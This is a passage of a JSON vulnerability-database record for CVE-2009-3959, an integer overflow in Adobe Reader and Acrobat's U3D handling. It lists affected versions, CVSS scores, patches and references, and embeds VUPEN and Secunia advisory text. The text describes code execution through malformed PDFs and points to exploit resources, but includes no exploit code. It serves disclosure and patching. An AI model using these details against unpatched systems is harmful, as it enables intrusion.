            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.7"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.1"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0.5a"
          },
          {
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "4.0"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "adobe",
            "version": null
          },
          {
            "model": "acrobat",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "model": "acrobat",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "reader",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "model": "reader",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 extras"
          },
          {
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 extras"
          },
          {
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.8.z extras"
          },
          {
            "model": "rhel desktop supplementary",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (client)"
          },
          {
            "model": "rhel supplementary",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (server)"
          },
          {
            "model": "rhel supplementary eus",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5.4.z (server)"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "adobe",
            "version": "8.0.0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "model": "linux enterprise sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "enterprise linux supplementary server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "networks callpilot 1002rp",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "desktop extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "desktop extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "model": "enterprise linux as extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux as extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "networks callpilot 1005r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "model": "networks callpilot 600r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "model": "linux enterprise sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.0"
          },
          {
            "model": "acrobat",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "model": "networks self-service speech server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "networks callpilot 200i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "model": "acrobat professional security updat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9"
          },
          {
            "model": "enterprise linux desktop supplementary client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "reader security updat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "model": "networks callpilot 703t",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "model": "enterprise linux ws extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux ws extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "networks callpilot 201i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "enterprise linux es extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux es extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "model": "acrobat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.2"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "model": "networks self-service media processing server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "BID",
            "id": "37756"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:adobe:acrobat",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:adobe:acrobat_reader",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_desktop_supplementary",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_supplementary",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_supplementary_eus",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nicolas Joly",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2009-3959",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2009-3959",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-41405",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2009-3959",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#508357",
                "trust": 0.8,
                "value": "65.84"
              },
              {
                "author": "NVD",
                "id": "CVE-2009-3959",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201001-092",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-41405",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2009-3959",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Integer overflow in the U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a malformed PDF document. \nAn attacker can exploit this issue by supplying a malicious PDF file or webpage. Failed attempts will likely result in denial-of-service conditions. \nNOTE: This issue was previously covered in BID 37667 (Adobe Acrobat and Reader January 2010 Multiple Remote Vulnerabilities), but has been given its own record to better document it. The Adobe Reader browser plug-in is available for several web browsers and operating systems and will automatically open PDF documents on websites. \nThey are used to create, view, search, digitally sign, verify, print, and\ncollaborate on Adobe PDF files. \n\n\nII. \n\n\nIII. AFFECTED PRODUCTS\n--------------------------------\n\nAdobe Reader version 9.2 and prior\nAdobe Acrobat version 9.2 and prior\n\n\nIV. Exploits - PoCs \u0026 Binary Analysis\n----------------------------------------\n\nIn-depth binary analysis of the vulnerability and a code execution\nexploit have been released by VUPEN Security through the\nVUPEN Exploits \u0026 PoCs Service :\n\nhttp://www.vupen.com/exploits\n\n\nV. SOLUTION\n---------------- \n\nUpgrade to version 9.3 or 8.2. \n\n\nVI. CREDIT\n-------------- \n\nThe vulnerability was discovered by Nicolas JOLY of VUPEN Security\n\n\nVII. ABOUT VUPEN Security\n---------------------------------\n\nVUPEN is a leading IT security research company providing vulnerability\nmanagement services to allow enterprises and organizations to eliminate\nvulnerabilities before they can be exploited, ensure security policy\ncompliance and meaningfully measure and manage risks. \n\nVUPEN also provides research services for security vendors (antivirus,\nIDS, IPS,etc) to supplement their internal vulnerability research efforts\nand quickly develop vulnerability-based and exploit-based signatures,\nrules, and filters, and proactively protect their customers against\npotential threats. \n\n* VUPEN Vulnerability Notification Service:\n\nhttp://www.vupen.com/english/services\n\n* VUPEN Exploits and In-Depth Vulnerability Analysis:\n\nhttp://www.vupen.com/exploits\n\n\nVIII. REFERENCES\n----------------------\n\nhttp://www.vupen.com/english/advisories/2010/0103\nhttp://www.adobe.com/support/security/bulletins/apsb10-02.html\n\n\nIX. DISCLOSURE TIMELINE\n----------------------------------- \n\n2009-11-06 - Vendor notified\n2009-11-06 - Vendor response\n2009-12-10 - Status update received\n2010-01-07 - Status update received\n2009-01-13 - Coordinated public Disclosure\n\n\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nAdobe Reader/Acrobat Code Execution Vulnerability\n\nSECUNIA ADVISORY ID:\nSA37690\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/37690/\n\nDESCRIPTION:\nA vulnerability has been reported in Adobe Reader and Acrobat, which\ncan be exploited by malicious people to compromise a user\u0027s system. \n\nNOTE: This vulnerability is currently being actively exploited. \n\nThe vulnerability is reported in versions 9.2 and prior. \n\nSOLUTION:\nDo not open untrusted PDF files. \n\nDo not visit untrusted websites or follow untrusted links. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported as a 0-day. \n\nORIGINAL ADVISORY:\nhttp://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          },
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "BID",
            "id": "37756"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          }
        ],
        "trust": 2.97
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-41405",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2009-3959",
            "trust": 3.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0103",
            "trust": 2.7
          },
          {
            "db": "SECTRACK",
            "id": "1023446",
            "trust": 2.6
          },
          {
            "db": "USCERT",
            "id": "TA10-013A",
            "trust": 2.6
          },
          {
            "db": "BID",
            "id": "37756",
            "trust": 2.3
          },
          {
            "db": "SECUNIA",
            "id": "38215",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "38138",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "37690",
            "trust": 0.9
          },
          {
            "db": "OSVDB",
            "id": "60980",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#508357",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA10-013A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092",
            "trust": 0.7
          },
          {
            "db": "CERT/CC",
            "id": "TA10-013A",
            "trust": 0.6
          },
          {
            "db": "SUSE",
            "id": "SUSE-SA:2010:008",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "14342",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "85207",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "83870",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "BID",
            "id": "37756"
          },
          {
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "id": "VAR-200912-0743",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T22:59:52.713000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "APSB10-02",
            "trust": 0.8,
            "url": "http://www.adobe.com/support/security/bulletins/apsb10-02.html"
          },
          {
            "title": "APSB10-02",
            "trust": 0.8,
            "url": "http://www.adobe.com/jp/support/security/bulletins/apsb10-02.html"
          },
          {
            "title": "RHSA-2010:0037",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0037.html"
          },
          {
            "title": "RHSA-2010:0038",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0038.html"
          },
          {
            "title": "RHSA-2010:0060",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0060.html"
          },
          {
            "title": "TA10-013A",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta10-013a.html"
          },
          {
            "title": "Red Hat: Critical: acroread security and bug fix update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100037 - Security Advisory"
          },
          {
            "title": "Red Hat: Critical: acroread security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100038 - Security Advisory"
          },
          {
            "title": "Red Hat: Critical: acroread security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100060 - Security Advisory"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/0xCyberY/CVE-T4PDF "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-189",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.7,
            "url": "http://www.vupen.com/english/advisories/2010/0103"
          },
          {
            "trust": 2.6,
            "url": "http://www.us-cert.gov/cas/techalerts/ta10-013a.html"
          },
          {
            "trust": 2.6,
            "url": "http://www.securitytracker.com/id?1023446"
          },
          {
            "trust": 2.2,
            "url": "http://www.adobe.com/support/security/bulletins/apsb10-02.html"
          },
          {
            "trust": 2.1,
            "url": "http://www.securityfocus.com/bid/37756"
          },
          {
            "trust": 1.8,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00009.html"
          },
          {
            "trust": 1.7,
            "url": "http://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/archive/1/508949"
          },
          {
            "trust": 1.2,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=554293"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a8539"
          },
          {
            "trust": 1.2,
            "url": "http://www.redhat.com/support/errata/rhsa-2010-0060.html"
          },
          {
            "trust": 1.2,
            "url": "http://secunia.com/advisories/38138"
          },
          {
            "trust": 1.2,
            "url": "http://secunia.com/advisories/38215"
          },
          {
            "trust": 1.2,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55557"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/37690/"
          },
          {
            "trust": 0.8,
            "url": "http://www.adobe.com/support/security/advisories/apsa09-07.html"
          },
          {
            "trust": 0.8,
            "url": "http://kb2.adobe.com/cps/532/cpsid_53237.html"
          },
          {
            "trust": 0.8,
            "url": "http://osvdb.org/show/osvdb/60980"
          },
          {
            "trust": 0.8,
            "url": "http://www.symantec.com/connect/blogs/zero-day-xmas-present"
          },
          {
            "trust": 0.8,
            "url": "http://voices.washingtonpost.com/securityfix/2009/12/hackers_target_unpatched_adobe.html"
          },
          {
            "trust": 0.8,
            "url": "http://vrt-sourcefire.blogspot.com/2009/12/this-is-what-happens-when-you-try-to-do.html"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3959"
          },
          {
